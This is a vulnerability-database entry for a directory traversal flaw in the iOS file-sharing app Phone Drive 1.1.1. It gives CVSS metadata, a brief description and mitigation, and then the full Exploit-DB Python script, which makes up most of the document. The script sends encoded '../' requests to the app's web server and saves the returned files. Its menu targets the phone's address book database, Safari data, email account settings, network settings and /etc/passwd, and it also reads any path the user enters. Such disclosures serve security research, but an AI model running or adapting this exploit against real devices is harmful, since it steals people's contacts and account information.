iPhone/iPad Phone Drive 1.1.1 Directory Traversal

vendor:

iPhone/iPad Phone Drive

by:

Khashayar Fereidani

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: iPhone/iPad Phone Drive

Affected Version From: 1.1.2001

Affected Version To: 1.1.2001

Patch Exists: NO

Related CWE: N/A

CPE: a:apple:iphone_ipad_phone_drive

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone 4 (IOS 4.3.3/Jailbroken)

2011

iPhone/iPad Phone Drive 1.1.1 Directory Traversal

iPhone/iPad Phone Drive 1.1.1 is vulnerable to a directory traversal attack which allows an attacker to read arbitrary files from the server. This vulnerability is due to insufficient sanitization of user-supplied input to the 'url' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable server. Successful exploitation will allow the attacker to read arbitrary files from the server.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered to ensure that it does not contain any malicious characters.

Source

Exploit-DB raw data:

#!/usr/bin/python
#----------------------------------------------------------------
#Software : iPhone/iPad Phone Drive 1.1.1
#Type of vulnerability : Directory Traversal
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)
#----------------------------------------------------------------
#Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8
#----------------------------------------------------------------
#Discovered by : Khashayar Fereidani
#Team Website : Http://IRCRASH.COM
#English Forums : Http://IRCRASH.COM/forums/
#Team Members : Khashayar Fereidani , Arash Allebrahim
#Email : irancrash [ a t ] gmail [ d o t ] com
#Facebook : http://facebook.com/fereidani
#Twitter : http://twitter.com/ircrash
#----------------------------------------------------------------
import urllib2
def urlread(url,file):
    url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
    u = urllib2.urlopen(url)
    localFile = open('result.html', 'w')
    localFile.write(u.read())
    localFile.close()
    print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT     -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
    url='http://'+url
if ((id>0) and (id<6)):
    file=f[id]
    urlread(url,file)
if (id==6):
    file=raw_input("Enter Local File Address : ")
    urlread(url,file)